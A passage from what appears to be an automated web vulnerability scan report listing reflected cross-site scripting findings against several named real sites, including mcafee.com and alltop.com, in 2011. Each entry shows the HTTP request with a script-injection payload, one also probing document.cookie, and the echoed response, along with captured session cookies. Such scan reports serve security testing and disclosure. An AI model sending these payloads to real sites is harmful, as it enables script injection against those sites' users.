This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smgmap.htm?accountId=automastermercedesbenz&locale=en_US1b9af'%3balert(1)//722916ad0cd HTTP/1.1
Host: googlev8.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/dealership/about.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:16:00 GMT
Connection: close
Set-Cookie: ssoid=5f4fdeb00a0a00ed0114d7392b1ea276;path=/;domain=.dealer.com
Set-Cookie: ddcpoolid=CmsPoolGoogleV8;path=/;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 2932

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms18.dealer.ddc p7072 -->

   <title>Google Maps</title>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859
...[SNIP]...
<![CDATA[*/
   window.DDC = window.DDC || {};
   DDC.locale = DDC.locale || 'en_US1b9af';alert(1)//722916ad0cd';
/*]]>
...[SNIP]...
4.38. http://home.mcafee.com/root/campaign.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://home.mcafee.com
Path:   /root/campaign.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70676"%3balert(1)//845bc386871 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 70676";alert(1)//845bc386871 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /root/campaign.aspx?cid=83831&70676"%3balert(1)//845bc386871=1 HTTP/1.1
Host: home.mcafee.com
Proxy-Connection: keep-alive
Referer: http://home.mcafee.com/downloads/free-virus-scan
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionInfo=AffiliateId=0; lBounceURL=http://home.mcafee.com/downloads/free-virus-scan; currentURL=http%3A//home.mcafee.com/downloads/free-virus-scan; isvt_visitor=yNo98QoBC2cAABJDQT4AAAAAAB1JCVeen0VKRW; WT_FPC=id=20dc5aca13b81baa15d1303034109486:lv=1303034109486:ss=1303034109486; session%5Fdata=%3cSessionData%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e0%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e0%3c%2fwt_destination_cid%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; SessionInfo=AffiliateId=0; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Locale=EN-US; HPrst=gu=122d9a9e-74f4-4d0e-85cf-3ecd0f120b8e&loc=EN-US; AffID=0-0; Currency=56; HRntm=aff=0-0&cur=56&lbu=http%3a%2f%2fhome.mcafee.com%2fdownloads%2ffree-virus-scan&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; s_cc=true; s_vi=[CS]v1|26D5719A051D00E9-600001368029DFAB[CE]; IS3_History=1302573891-1-74_3--1__3_; IS3_GSV=DPL-2_TES-1303044907_PCT-1303044907_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; FSRCookie=isAlive=1||ForeseeLoyalty=1; foresee.alive=1303045172416; s_nr=1303045173262-New; s_ev8=%5B%5B%27mcafee%27%2C%271303045173265%27%5D%5D; s_sq=mcafeecomglobal%3D%2526pid%253Dconsumer%25253Aen-us%25253Adirect-0-mcafee%25253Afree_services%25253Afreescan_scan_initiated%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Bjavascript%25253Alocation.href%25253D%252522http%25253A//home.mcafee.com/root/campaign.aspx%25253Fcid%25253D83831%2526oidt%253D2%2526ot%253DSUBMIT

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Sat, 17-Apr-2021 12:59:55 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Wed, 17-Apr-2041 12:59:55 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0; path=/
Set-Cookie: SessionInfo=AffiliateId=0; path=/
Set-Cookie: CampaignId=83831; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=83831; path=/
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e0%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e0%3c%2fwt_destination_cid%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Sat, 17-Apr-2021 12:59:55 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=122d9a9e-74f4-4d0e-85cf-3ecd0f120b8e&loc=EN-US; domain=mcafee.com; expires=Sat, 17-Apr-2021 12:59:55 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=83831&lbu=http%3a%2f%2fhome.mcafee.com%2fdownloads%2ffree-virus-scan&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
X-Powered-By: ASP.NET
MS: SJV7
X-UA-Compatible: IE=8
Date: Sun, 17 Apr 2011 12:59:54 GMT
Content-Length: 1254


<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><title>

</title></head>
<body>
<form name="form1" method="post" action="campaign.aspx?cid=83831&amp;70676%22%3balert(1)%2f%2f8
...[SNIP]...
<script type="text/javascript">
window.location.href = "http://liteapps.mcafee.com/apps/mss/download.asp?affid=0&large=1&cid=83831&70676";alert(1)//845bc386871=1";
</script>
...[SNIP]...
4.39. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload b6e35<script>alert(1)</script>73b5bcd535 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=I09839b6e35<script>alert(1)</script>73b5bcd535 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/za/additem?a5f9f=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; NETSEGS_E05510=379226250c6302c7&E05510&0&4dc81472&0&&4da25a08&00f8712b16a2747053422af6cef97d9a; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc816d2&20&10385,10387,10389,10395,10397,10402,10408,10406,10410,10412,10413,10419,10033,10336,10363,10424,10426,50033,50052,50000&4da2566e&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc8192a&0&&4da27787&00f8712b16a2747053422af6cef97d9a; NETSEGS_F08747=379226250c6302c7&F08747&0&4dcaca1f&0&&4da49860&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dcacfbc&0&&4da5225d&00f8712b16a2747053422af6cef97d9a; udm_0=MLvvNCMJaSprXddp9/QSiCJJZUpA13VK8YcBYRcedc3yUwOBneDsJGtepQEFjR+a+OupXIwcZ1OeTUVINTqk0zO5oWogyihu9s9rBQg1IH1+bVjad47pUEFaS/Xd13eTo/zf95LMFqzMHYGD0ggaVHs7MRO3s9KnN6v+NxGTFAvFUtGHQFtHguOo/CvxF8q7+XjOi6n6Xe0Oy+Z8gE8h646FdCQE2e/wVT7XRaaoCYI4E3rFlS8f24WStc4+SLyr1XjK6hEIW7ke7hwEEmOI1djxOPTAcc4V8XYgXQ7DLaeRZX9QpHdeR4g0UuqWEwM0xt+YZBjJSjnr53AZ35+iGe9OrwyEQOIQGNgO9Jb3SSh7VK8qanuelhFmVzC6B07MEeHjEWrXzM5MWlxRoH0b1dzBr0NRhbCM9ROMXz4+dCBhf3/LbMzMfdbVN2vRgE07XhieP4fHn7IizW7lorbHlfFrX4kbNLnN1cJmjOt06Px6JUE3uiH5TTs0f0q/ilm2oHrO/jVKY19wNiFOs7mnaCwnyuU5zR6KnSbBiv5bJbYqkfNvnRT4tUvJFoTN4nwKbV3pHZoHUze2ohoFkdR7B38w4MvT7y2ZABf/CG3VdS/1UAGmSzR7qZd4xSbEB0Se3EQsBeJLS0W1eA+Mii/MYkcaHsWiEOyM7jy4iVHA32+JFkR++d7qZpV416jIX9iC9yP3p7KQ5/n+OPhtzLvtR1N2DSIKPct6tD63g0wwoeBKHDw/Q+lPvbajqP+Omw/Ns/KN09RTJ7b/XCKnRnQXiC1p8lyJe/hnhUHgXBmVJ9RasT8W/VjblkzR7R++rTX9X5e02b+EM9FaqjOZi2Z7yKH9ozf40veaXs916NWABllj19F0oVirrRzhrVMnopyGpRD/nc5VuyHE7Tzab0IjGxMhiNP7FrYVlFMr7kvDqRVLuhdTQ7HYkb2PWEIN0Io8Noc6Qafpmhx71C5va7NYKsPqPjYIs7T5RHPtgB96jc9dMnlHpDUk1czteck0vZT1szvwTMqvUHAwfrNCqe6+B5/yG2WgJBo69PWL7i2MzP3zKnrXB8Feb89gExuaz/NSrCOUWhw4Ki3AUZS590bdWvbTxFy4nr8v6iI04f3u7/yqG2yjNFyuBRyz6Iz8mwwJAV1LvBgTQCx85+PA6YryjOyQUQTMorTERiOFDkPHDA8mSCwSAH5tkW1it0mUfxxBm3+G14XMNtKOe2+RIHoUM7Ybz/e9HoPDkImVuC4jFcefU8uuh53jlDVHCsceenbRU6WeFliKlZetf2awKXuKKIxpioly9QITVF8x9rettZmpiPORzVuSmR65YOJDFVIyNOAyo2Y6qoL/zJ8tHQ==; NETSEGS_K08784=379226250c6302c7&K08784&0&4dce87da&0&&4da90335&00f8712b16a2747053422af6cef97d9a; rsiPus_0="MLtHrVEucB5zJoH0UljaSkoWWEQP/HsN06aUy4hJ4iAxx4kUbDRiYNBumGFB/7hKFwUF5zkuxs3CTF/hxUboLnFkdRFbpB82GEClPl/i5LndwMyIvIcjCjo7BukEz0m4KS8PDEhKXh6N5GwMhcufRERxUalBRHypYmdvWKAhKNafO2dPtsGuKb5neHsE6FwjUIRA83vfNnPyB8p5PQ1zYBnhNMA6wEUVThR2g7B12YjsMRCFaKHz0TGKswVgaiTCqLjgfT0S+GuZLiD52/VC0Nv2ONiR1XNhgTjk6Q0+hk9MQpEV63vVrfOvxiDyd6HBsoG8G+z06EiVnR8D/xRKZzFJC3E63+8VHkDGmCkdgwhnroue3nKVHQHh"; rsi_us_1000000="pUP1ZTmnPwIYFEKmY9/6A4gq13OqBLIPfAIwaLPuWvzroz3RO6ywpasmnCZ6zXE2WlA0J4hR7z/d18QtB0zQICAlCzDSokYwgb2QNGJ15/S+MvUxS+Te5UVeHz9JdiDw0K/0EYf29cLyAOcjvS8jQB7beWFHA0BGY7GeBW/MsnWI4UPfTLKd31zD36g1ZqMWwnUF9jVX74JrRQR73VcAl55tRxG4rTCpo3+I/SafnpmPBzUaa/bO8R02njGCcmuIH6LCnT7bnMKmty4oF91N+ptYuAsah0DCUaDiBrT+n4WxELFx7BgNNvT1D5nOyJNjDh6I5dM+/i+tBWukNrn3QOGjDeB1wEZK9TkdF6pvDuLBkeTV/bcgvIBRxRW43FqsYqml/akYJg74KEP6aj+PB2+Bx0JPJvXDWj/PWwzYCwlcb+5ZnJGV2ab/qOt9BrseFVypzD3DbbaDNjdTHr0wAqmJJRaOsKWhn2U9EnMwcH2TXgX0tciaHa0T4h9sUcZaIyeNGvTowFQzEDXKiAguT0d2OOZ8CYxiYjOU78fISCUjp+5BKu6pDIBid2gsgGuiYSwDa8KWFt0lnUp54/5XBdDJ6VrdZa4zf/5D/InSUbq5cxuSbuMzRE67JI5kPOBRs49p3a/cpKFPzSZ2h1ftLm6aj6oOCAaBPrVlWB1gW0j/KtgScBEqpJVajLm3cFbaRnING7007FdavPnbJT4wBftL/cd5SsOeHt6N75ZEF3lMyUULERJMrLcftVNYJrm5j2J+sE6RX0VH"; rsi_segs_1000000=pUPFJU2Br3IM1p94u+w/JTlpea6iE6ea4dqUtRDorAMqsncbnFjc6nNskvAlloepKxEYDeToWSqCVsVxZnlRuDx7h5Ea24oGNFbXEHQrasy4JCDlXf200Z7tQxzqzT7PDo/eR1qUcqeI+3EDwcun/AAYgjloHX61Y4c7Hvi4zjIKdOGRSqIRtGLjBVER2sD3CjtZ8En8TPq0EE/msi6btEvQhcMwR74VMe4oTmE8951fn5uhhxlREM4fiwBI+G9ouXWU9gKJRtfR4qM2z1jQZGgqBFTaKHYIvod7xmJw+xLYp49u/i1ph8m/SFWsPjxgOlFnng8XR7fuEOOne4rwDVuRJBHPrzAmBFvaDz4N9iTrTjhuRvF5MBGbAMZ7OIST0jt76s/RSCeW; rtc_vEGl=MLsP8yMOpj9npihAUr5veO17+bGDNlfDNYUVEaaFy3Qa3QeSNA+pUy8X71aMMnqJWFCFfMdx0QJk1bpFee+Bru4Evuk6jJSJ5K5QPBoQ29CRrbObs3X7UbBMgXutLDUvFS6EiAxiGvCYsx4ZVZnlulYU4N5ED6IWuNwJ/tYMbLxhG4NsqkrqlLd9ESuY8cwqHf3rdI/wpTZmnlmU+B262lJXJWTzDIzydSyX0uLeCdJ0J0tDi3t7J2FJbm43pOk2722GtDFUF9cM354Tli8E+l7iF3vPKcUN42uTo+l3iMlPs/wt+IXbsr6bFzfDtA8KF6JVgdU63L+OMIsPeYravHNeBAQZ9CrY9MyyDnl62djTds48dfAabNevlq6f31weH0ybotK+O6yIvh/Esk/kRuOt4uCIbRcNyrYKmOp3khFnZafOY2PNRM/sN8gkgBNyB+XQMfjlRozGCWKOxUy8FqRLhpDMO03oEUvYPFhuVS1Vg2CvzHOPyqqrGubX/qaKhpF9psA7qvt8CaOK5jxOaoY2aI9H7FWA4qsAMiTtNbGwudPP9i58GHHumvMHAy6jQohCGZ3dvPzzTu24ESHQUGWxfA9hF1aQZp8DXD/H4TxKtfmW1R/toGkJ/NnVE/h1GCtPt1HlE83hw2el+hrsWgvpjC3aHgsq

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 17 Apr 2011 14:24:11 GMT
Cache-Control: max-age=86400, private
Expires: Mon, 18 Apr 2011 14:24:11 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 14:24:10 GMT
Content-Length: 127

/*
* JavaScript include error:
* The customer code "I09839B6E35<SCRIPT>ALERT(1)</SCRIPT>73B5BCD535" was not recognized.
*/
4.40. http://law.alltop.com/css/din-bold.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://law.alltop.com
Path:   /css/din-bold.swf

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d0c7"><script>alert(1)</script>4acc94967d7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css4d0c7"><script>alert(1)</script>4acc94967d7/din-bold.swf HTTP/1.1
Host: law.alltop.com
Proxy-Connection: keep-alive
Referer: http://law.alltop.com/widget2fa3b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3c139cf78b0/?type=js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: myAlltopSession=065jkhrbmh85idvk74bpr630u0; alltop_v=eb8e1238e83a994c827243f20aced46d; alltop_r=2; sifrFetch=true; __qca=P0-1457044879-1302961854448; __utmz=160012002.1302961854.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; __utma=160012002.1443153480.1302961854.1302961854.1302961854.1; __utmc=160012002; __utmb=160012002.2.9.1302961854546; __qseg=Q_D|Q_T|Q_2891|Q_2360|Q_2349|Q_2346|Q_2340|Q_1659|Q_1286|Q_1155|Q_1154|Q_1153|Q_1151|Q_1150|Q_1149|Q_1148|Q_1147|Q_1145|Q_983|Q_982

Response

HTTP/1.1 404 Not Found
Date: Sat, 16 Apr 2011 13:51:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Fri, 16-Apr-2010 13:51:36 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=065jkhrbmh85idvk74bpr630u0; path=/; domain=.alltop.com
Expires: Sat, 16 Apr 2011 14:51:36 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Mon, 15 Nov 2010 16:29:58 GMT
Set-Cookie: alltop_r=2; expires=Fri, 15-Jul-2011 13:51:36 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 930373

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/css4d0c7"><script>alert(1)</script>4acc94967d7/din-bold.swf" method="post" accept-charset="utf-8">
...[SNIP]...
4.41. http://law.alltop.com/css/din-bold.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://law.alltop.com
Path:   /css/din-bold.swf

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91506"><script>alert(1)</script>bc3da8f28a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/din-bold.swf91506"><script>alert(1)</script>bc3da8f28a0 HTTP/1.1
Host: law.alltop.com
Proxy-Connection: keep-alive
Referer: http://law.alltop.com/widget2fa3b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3c139cf78b0/?type=js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: myAlltopSession=065jkhrbmh85idvk74bpr630u0; alltop_v=eb8e1238e83a994c827243f20aced46d; alltop_r=2; sifrFetch=true; __qca=P0-1457044879-1302961854448; __utmz=160012002.1302961854.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; __utma=160012002.1443153480.1302961854.1302961854.1302961854.1; __utmc=160012002; __utmb=160012002.2.9.1302961854546; __qseg=Q_D|Q_T|Q_2891|Q_2360|Q_2349|Q_2346|Q_2340|Q_1659|Q_1286|Q_1155|Q_1154|Q_1153|Q_1151|Q_1150|Q_1149|Q_1148|Q_1147|Q_1145|Q_983|Q_982

Response

HTTP/1.1 404 Not Found
Date: Sat, 16 Apr 2011 13:51:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Fri, 16-Apr-2010 13:51:50 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=065jkhrbmh85idvk74bpr630u0; path=/; domain=.alltop.com
Expires: Sat, 16 Apr 2011 14:51:50 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Mon, 15 Nov 2010 16:29:58 GMT
Set-Cookie: alltop_r=2; expires=Fri, 15-Jul-2011 13:51:50 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 930373

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/css/din-bold.swf91506"><script>alert(1)</script>bc3da8f28a0" method="post" accept-charset="utf-8">
...[SNIP]...
4.42. http://law.alltop.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://law.alltop.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32383"><script>alert(1)</script>e537a41bbed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico32383"><script>alert(1)</script>e537a41bbed HTTP/1.1
Host: law.alltop.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: myAlltopSession=065jkhrbmh85idvk74bpr630u0; alltop_v=eb8e1238e83a994c827243f20aced46d; alltop_r=2; sifrFetch=true; __qca=P0-1457044879-1302961854448; __utmz=160012002.1302961854.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; __utma=160012002.1443153480.1302961854.1302961854.1302961854.1; __utmc=160012002; __utmb=160012002.2.9.1302961854546; __qseg=Q_D|Q_T|Q_2891|Q_2360|Q_2349|Q_2346|Q_2340|Q_1659|Q_1286|Q_1155|Q_1154|Q_1153|Q_1151|Q_1150|Q_1149|Q_1148|Q_1147|Q_1145|Q_983|Q_982

Response

HTTP/1.1 404 Not Found
Date: Sat, 16 Apr 2011 13:51:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Fri, 16-Apr-2010 13:51:32 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=065jkhrbmh85idvk74bpr630u0; path=/; domain=.alltop.com
Expires: Sat, 16 Apr 2011 14:51:32 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Mon, 15 Nov 2010 16:29:58 GMT
Set-Cookie: alltop_r=2; expires=Fri, 15-Jul-2011 13:51:32 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 930353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/favicon.ico32383"><script>alert(1)</script>e537a41bbed" method="post" accept-charset="utf-8">
...[SNIP]...
4.43. http://law.alltop.com/widget/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://law.alltop.com
Path:   /widget/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fa3b"><script>alert(1)</script>3c139cf78b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /widget2fa3b"><script>alert(1)</script>3c139cf78b0/?type=js HTTP/1.1
Host: law.alltop.com
Proxy-Connection: keep-alive
Referer: http://www.jamesprobinsonlaw.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 16 Apr 2011 13:49:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Fri, 16-Apr-2010 13:49:07 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=vpc5m17i3plcmgqib9tk2rbp06; path=/; domain=.alltop.com
Expires: Sat, 16 Apr 2011 14:49:07 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Mon, 15 Nov 2010 16:29:58 GMT
Set-Cookie: alltop_v=4ca316e9121138d4d76ae9359c78da59; expires=Tue, 13-Apr-2021 13:49:07 GMT; path=/; domain=law.alltop.com
Set-Cookie: alltop_r=2; expires=Fri, 15-Jul-2011 13:49:07 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 930369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/widget2fa3b"><script>alert(1)</script>3c139cf78b0/?type=js" method="post" accept-charset="utf-8">
...[SNIP]...
4.44. http://mbox9e.offermatica.com/m2/eset/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mbox9e.offermatica.com
Path:   /m2/eset/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 6210f<script>alert(1)</script>d253288866b was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/eset/mbox/standard?mboxHost=www.eset.com&mboxSession=1303045152447-372951&mboxPage=1303045152447-372951&mboxCount=1&mbox=mbx_company_landing6210f<script>alert(1)</script>d253288866b&mboxId=0&mboxTime=1303027152504&mboxURL=http%3A%2F%2Fwww.eset.com%2Fus%2Fcompany&mboxReferrer=&mboxVersion=37 HTTP/1.1
Host: mbox9e.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/company
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 215
Date: Sun, 17 Apr 2011 12:59:57 GMT
Server: Test & Target

